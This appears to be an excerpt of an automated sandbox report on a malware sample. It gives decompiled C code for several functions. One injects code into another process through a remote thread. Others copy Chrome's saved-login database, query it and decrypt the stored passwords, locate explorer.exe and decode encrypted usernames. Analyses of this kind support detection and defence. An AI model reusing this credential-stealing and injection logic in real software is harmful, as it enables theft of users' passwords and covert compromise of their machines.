                                      • Opcode Fuzzy Hash: 779dad72e6231444c9569a291b1b17fa54f0aef0765d1345e780e9135fcf9713
                                      • Instruction Fuzzy Hash: A81189B190021C6BDB20DBA4DC89EEEB77CDB45714F5004A7B609D3181D678AF888F54
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043FD9E, Relevance: 13.6, APIs: 9, Instructions: 81injectionmemorythreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043FD9E(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E004310AD(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E00431114( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27, 0x446150, 0x800, 0);
				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x44679c = _t25;
				return _t25;
			}











                                      0x0043fdb8
                                      0x0043fdba
                                      0x0043fdc8
                                      0x0043fdd6
                                      0x0043fddb
                                      0x0043fde9
                                      0x0043fe13
                                      0x0043fe1d
                                      0x0043fe2e
                                      0x0043fe49
                                      0x0043fe5b
                                      0x0043fe5f
                                      0x0043fe6e
                                      0x0043fe76
                                      0x0043fe7d

                                      APIs
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0043FDB2
                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0043FDBD
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0043FDDB
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0043FE05
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,00446150,00000800,00000000,?,?,00000000), ref: 0043FE1D
                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0043FE2E
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0043FE45
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0043FE5B
                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0043FE6E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocVirtual$HeapMemoryWrite$CreateCurrentFileModuleNameOpenProtectRemoteThread
                                      • String ID:
                                      • API String ID: 910334972-0
                                      • Opcode ID: 9e01070dc42aa24a31b8a9f0b3759439ae7c270be827b80846d18e49f942c06c
                                      • Instruction ID: 70c266dc8be2bfae17259e781995ea1b5f97dc5b5b5658e49603fa4c9ed2a209
                                      • Opcode Fuzzy Hash: 9e01070dc42aa24a31b8a9f0b3759439ae7c270be827b80846d18e49f942c06c
                                      • Instruction Fuzzy Hash: 7A215475640218BEF7245B51DD4BFEB7BACDB45760F200175B704A61D0D6F06D408FA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043AFDF, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 290fileencryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E0043AFDF(void* __ecx, void* __eflags) {
				char _v8;
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t127;
				void* _t128;
				signed int _t131;
				void* _t135;
				char _t136;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				char _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t191;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				signed int _t264;
				void* _t267;
				void* _t268;
				void* _t269;

				_t269 = __eflags;
				_t263 = __ecx;
				E004331EC( &_v44, "SELECT * FROM logins");
				_t260 = 0x1a;
				E0043D75B( &_v12, _t260, _t269);
				E00433297( &_v12, _t260, _t269, "\\");
				_t261 = 8;
				E00433162( &_v12, _t269, E004332D4( &_v36, _t261, _t269));
				E00435A2D(_v36);
				E00433297( &_v12, _t261, _t269, L".tmp");
				_t262 = 0x1c;
				E0043D75B( &_v20, _t262, _t269);
				E00433297( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
					L4:
					_t264 = 0;
					goto L5;
				} else {
					E00433264( &_v20,  &_v12);
					_t127 = E00433381( &_v20,  &_v36);
					_t128 =  *((intOrPtr*)(_t263 + 0x2c))( *_t127,  &_v40, 2, 0);
					_t208 = _v36;
					_t268 = _t267 + 0x10;
					E00435A2D(_v36);
					if(_t128 == 0) {
						_t131 =  *((intOrPtr*)(_t263 + 0x38))(_v40, _v44, 0xffffffff,  &_v8, 0);
						_t268 = _t268 + 0x14;
						__eflags = _t131;
						if(_t131 != 0) {
							goto L3;
						}
						_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
						_t264 = 1;
						while(1) {
							__eflags = _t135 - 0x64;
							if(_t135 != 0x64) {
								break;
							}
							_v68 = _v68 & 0x00000000;
							_t191 = 0;
							_v64 = 0;
							_t136 = E004359AA(_t264);
							_v16 = _t136;
							E004331EC( &_v24,  *((intOrPtr*)(_t263 + 0x40))(_v8, 0));
							E004331EC( &_v60,  *((intOrPtr*)(_t263 + 0x40))(_v8, _t264));
							_t141 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
							__eflags = _t141;
							if(_t141 > 0) {
								E00432F52( &_v16, E004331EC( &_v48,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
								E00435A2D(_v48);
							}
							_t142 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
							__eflags = _t142;
							if(_t142 > 0) {
								E00432F52( &_v16, E004331EC( &_v52,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
								E00435A2D(_v52);
							}
							_t143 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
							__eflags = _t143;
							if(_t143 > 0) {
								_t171 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
								_v84 = _t171;
								_t172 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
								_t268 = _t268 + 0x10;
								_v80 = _t172;
								_t175 =  &_v84;
								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
								__eflags = _t175;
								if(_t175 != 0) {
									E00432DC1( &_v68, _v72, _v76);
									LocalFree(_v72);
									_t191 = _v64;
								}
							}
							_t144 = E00432EB9( &_v16);
							__eflags = _t144;
							if(_t144 > 0) {
								L17:
								_v100 = 0;
								_v96 = 0;
								_v92 = 0;
								__eflags = E00432EB9( &_v24);
								if(__eflags > 0) {
									E00433264( &_v100, E00432ECA( &_v24, __eflags,  &_v28));
									E00435A2D(_v28);
									_t78 =  &_v28;
									 *_t78 = _v28 & 0x00000000;
									__eflags =  *_t78;
								}
								__eflags = E00432EB9( &_v16);
								if(__eflags > 0) {
									E00433264( &_v96, E00432ECA( &_v16, __eflags,  &_v32));
									E00435A2D(_v32);
									_t85 =  &_v32;
									 *_t85 = _v32 & 0x00000000;
									__eflags =  *_t85;
								}
								__eflags = _t191;
								if(_t191 != 0) {
									E00433264( &_v92, E00432ECA(E00432D59( &_v68,  &_v56), __eflags,  &_v36));
									E00435A2D(_v36);
									_t93 =  &_v36;
									 *_t93 = _v36 & 0x00000000;
									__eflags =  *_t93;
									E00435A2D(_v56);
								}
								_t268 = _t268 - 0x10;
								_v88 = _t264;
								E00431EB9(_t268,  &_v100);
								E00431EEF(_t263);
								E0043138F( &_v100);
								goto L24;
							} else {
								__eflags = _t191;
								if(_t191 == 0) {
									L24:
									E00435A2D(_v60);
									E00435A2D(_v24);
									E00435A2D(_v16);
									E00432E66( &_v68);
									_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
									continue;
								}
								goto L17;
							}
						}
						 *((intOrPtr*)(_t263 + 0x60))(_v8);
						 *((intOrPtr*)(_t263 + 0x34))();
						E0043345A(_t268,  &_v12);
						E0043DEA9(_v40);
						L5:
						E00435A2D(_v20);
						E00435A2D(_v12);
						E00435A2D(_v44);
						return _t264;
					}
					L3:
					E0043345A(_t268,  &_v12);
					E0043DEA9(_t208);
					goto L4;
				}
			}
















































                                      0x0043afdf
                                      0x0043afe8
                                      0x0043aff2
                                      0x0043aff9
                                      0x0043affd
                                      0x0043b00a
                                      0x0043b011
                                      0x0043b01e
                                      0x0043b026
                                      0x0043b033
                                      0x0043b03a
                                      0x0043b03e
                                      0x0043b04b
                                      0x0043b05b
                                      0x0043b0b7
                                      0x0043b0b7
                                      0x00000000
                                      0x0043b06f
                                      0x0043b076
                                      0x0043b082
                                      0x0043b091
                                      0x0043b094
                                      0x0043b097
                                      0x0043b09c
                                      0x0043b0a3
                                      0x0043b0e6
                                      0x0043b0e9
                                      0x0043b0ec
                                      0x0043b0ee
                                      0x00000000
                                      0x00000000
                                      0x0043b0f3
                                      0x0043b0f8
                                      0x0043b2ea
                                      0x0043b2eb
                                      0x0043b2ee
                                      0x00000000
                                      0x00000000
                                      0x0043b0fe
                                      0x0043b102
                                      0x0043b106
                                      0x0043b109
                                      0x0043b112
                                      0x0043b11e
                                      0x0043b130
                                      0x0043b13a
                                      0x0043b13f
                                      0x0043b141
                                      0x0043b15a
                                      0x0043b162
                                      0x0043b162
                                      0x0043b16c
                                      0x0043b171
                                      0x0043b173
                                      0x0043b18c
                                      0x0043b194
                                      0x0043b194
                                      0x0043b19e
                                      0x0043b1a3
                                      0x0043b1a5
                                      0x0043b1ac
                                      0x0043b1b4
                                      0x0043b1b7
                                      0x0043b1ba
                                      0x0043b1bd
                                      0x0043b1cb
                                      0x0043b1cf
                                      0x0043b1d5
                                      0x0043b1d7
                                      0x0043b1e2
                                      0x0043b1ea
                                      0x0043b1f0
                                      0x0043b1f0
                                      0x0043b1d7
                                      0x0043b1f6
                                      0x0043b1fb
                                      0x0043b1fd
                                      0x0043b207
                                      0x0043b20c
                                      0x0043b20f
                                      0x0043b212
                                      0x0043b21a
                                      0x0043b21c
                                      0x0043b22e
                                      0x0043b236
                                      0x0043b23b
                                      0x0043b23b
                                      0x0043b23b
                                      0x0043b23b
                                      0x0043b247
                                      0x0043b249
                                      0x0043b25b
                                      0x0043b263
                                      0x0043b268
                                      0x0043b268
                                      0x0043b268
                                      0x0043b268
                                      0x0043b26c
                                      0x0043b26e
                                      0x0043b28b
                                      0x0043b293
                                      0x0043b29b
                                      0x0043b29b
                                      0x0043b29b
                                      0x0043b29f
                                      0x0043b29f
                                      0x0043b2a4
                                      0x0043b2a7
                                      0x0043b2b0
                                      0x0043b2b7
                                      0x0043b2bf
                                      0x00000000
                                      0x0043b1ff
                                      0x0043b1ff
                                      0x0043b201
                                      0x0043b2c4
                                      0x0043b2c7
                                      0x0043b2cf
                                      0x0043b2d7
                                      0x0043b2df
                                      0x0043b2e7
                                      0x00000000
                                      0x0043b2e7
                                      0x00000000
                                      0x0043b201
                                      0x0043b1fd
                                      0x0043b2f7
                                      0x0043b2fd
                                      0x0043b307
                                      0x0043b30c
                                      0x0043b0b9
                                      0x0043b0bc
                                      0x0043b0c4
                                      0x0043b0cc
                                      0x0043b0d7
                                      0x0043b0d7
                                      0x0043b0a5
                                      0x0043b0ac
                                      0x0043b0b1
                                      0x00000000
                                      0x0043b0b6

                                      APIs
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0043B053
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0043B065
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043B1CF
                                      • LocalFree.KERNEL32(?,?,?), ref: 0043B1EA
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043DEA9: DeleteFileW.KERNEL32(?,?,?,004329BF), ref: 0043DEB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
                                      • String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 1985407002-2809225024
                                      • Opcode ID: 98b6e539f244b108d916ea1b31e25e203f18e9d614f856f58691977bc86e3fde
                                      • Instruction ID: fcef8ca172da253c564e006a8211cc40ad6bb8611a16e2976c011d9aecb7f64a
                                      • Opcode Fuzzy Hash: 98b6e539f244b108d916ea1b31e25e203f18e9d614f856f58691977bc86e3fde
                                      • Instruction Fuzzy Hash: 54A15D71900109ABDF05EFA1DD56AEEBB79FF08305F10112AF112A61A1EF78AA05DB58
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00CCBCE2, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1469COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: d298cc8daf3d2cadf7bab5d5c08e48a398abbc9902adb8634d59988627f28fd6
                                      • Instruction ID: be4eff87c30ab07de11af9fe5f70ce068a32d345da919a5aa93e5eda233a3e86
                                      • Opcode Fuzzy Hash: d298cc8daf3d2cadf7bab5d5c08e48a398abbc9902adb8634d59988627f28fd6
                                      • Instruction Fuzzy Hash: 8EC23B71E046288FDB25CE68DD81BEAB7B5EB49354F1441EED81EE7240E774AE818F40
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      Function 0043FE7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043FE7E(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00431052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E004310E6( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}








                                      0x0043fe98
                                      0x0043fea4
                                      0x0043feac
                                      0x0043feba
                                      0x0043fee7
                                      0x0043fed7
                                      0x00000000
                                      0x0043fef8
                                      0x0043fee1
                                      0x0043fee1
                                      0x0043feec
                                      0x00000000

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043FE8D
                                      • Process32First.KERNEL32(00000000,?), ref: 0043FEBA
                                      • Process32Next.KERNEL32(00000000,?), ref: 0043FEE1
                                      • CloseHandle.KERNEL32(00000000), ref: 0043FEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: explorer.exe
                                      • API String ID: 420147892-3187896405
                                      • Opcode ID: b6efa8424f0e24ceca2991aa02c1e8b7b678d2db9d4c7f0dd08d980231dc2b07
                                      • Instruction ID: 45dca76c084bc66213b39bbb762243bcdcd602548e03d5f1d291c61269c21bda
                                      • Opcode Fuzzy Hash: b6efa8424f0e24ceca2991aa02c1e8b7b678d2db9d4c7f0dd08d980231dc2b07
                                      • Instruction Fuzzy Hash: 6F01F976A01214ABD7209761EC4AFDA33FCDF4E310F5000B6FA05E2190EB78DE958A6C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 004392D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 24%
                                      			E004392D8(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E00431130(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}




















                                      0x004392d8
                                      0x004392e0
                                      0x004392e8
                                      0x004392eb
                                      0x004392ed
                                      0x004392f0
                                      0x004392fe
                                      0x00439300
                                      0x00439303
                                      0x00439305
                                      0x00439308
                                      0x0043930b
                                      0x0043930f
                                      0x00439310
                                      0x00439308
                                      0x00439314
                                      0x00439317
                                      0x0043931a
                                      0x0043931d
                                      0x00439328
                                      0x0043932c
                                      0x00439334
                                      0x0043935d
                                      0x00439336
                                      0x00439338
                                      0x0043933a
                                      0x0043933d
                                      0x00439343
                                      0x00439343
                                      0x00439347
                                      0x0043934a
                                      0x0043934d
                                      0x00439350
                                      0x00439343
                                      0x0043935a
                                      0x0043935a
                                      0x0043936d

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0043928C,00001000,?,00000000,00001000), ref: 004392F6
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0043928C), ref: 0043932C
                                      • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00439363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                      • String ID: Could not decrypt
                                      • API String ID: 3112367126-1484008118
                                      • Opcode ID: fd3e507469d5b0c164968fa78ed29cbab0a2911fbe21c26fb5410def05336900
                                      • Instruction ID: 1efc193751193310c14b7db2d828aeccb0e37247e73c6ca0e05a27b79ae8fe77
                                      • Opcode Fuzzy Hash: fd3e507469d5b0c164968fa78ed29cbab0a2911fbe21c26fb5410def05336900
                                      • Instruction Fuzzy Hash: F01106B69002199BCB11CB99C9809EEF7BCEF4D700F50406AEA55E3251E2759E05CBB4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00CC5F98, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00CC6090
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC609A
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00CC60A7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 9dafc64c9d518cf01f5c53f23e1f112b6bca64e415103df85e669bd90aeaf2a3
                                      • Instruction ID: c81dcecf5143947f1400616fcc3b2d7638af06999eb793aa72c253663e14fa6e
                                      • Opcode Fuzzy Hash: 9dafc64c9d518cf01f5c53f23e1f112b6bca64e415103df85e669bd90aeaf2a3
                                      • Instruction Fuzzy Hash: 2531D575901218ABCB21DF69D888B8DBBB8BF08310F5041DAE91CA7251E7309F859F45
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Function 00439E04, Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00439E04(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E00431130(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E00431052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E00435A3C(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}














                                      0x00439e04
                                      0x00439e0c
                                      0x00439e1e
                                      0x00439e21
                                      0x00439e34
                                      0x00439e4f
                                      0x00439e5b
                                      0x00439e5e
                                      0x00439e64
                                      0x00439e6f
                                      0x00439e73
                                      0x00439e76
                                      0x00439e79
                                      0x00439e85
                                      0x00439e8e
                                      0x00439e9a
                                      0x00439ea6

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,004396F1,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00439E21
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00439E4F
                                        • Part of subcall function 00435A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00439E9C
                                      Memory Dump Source
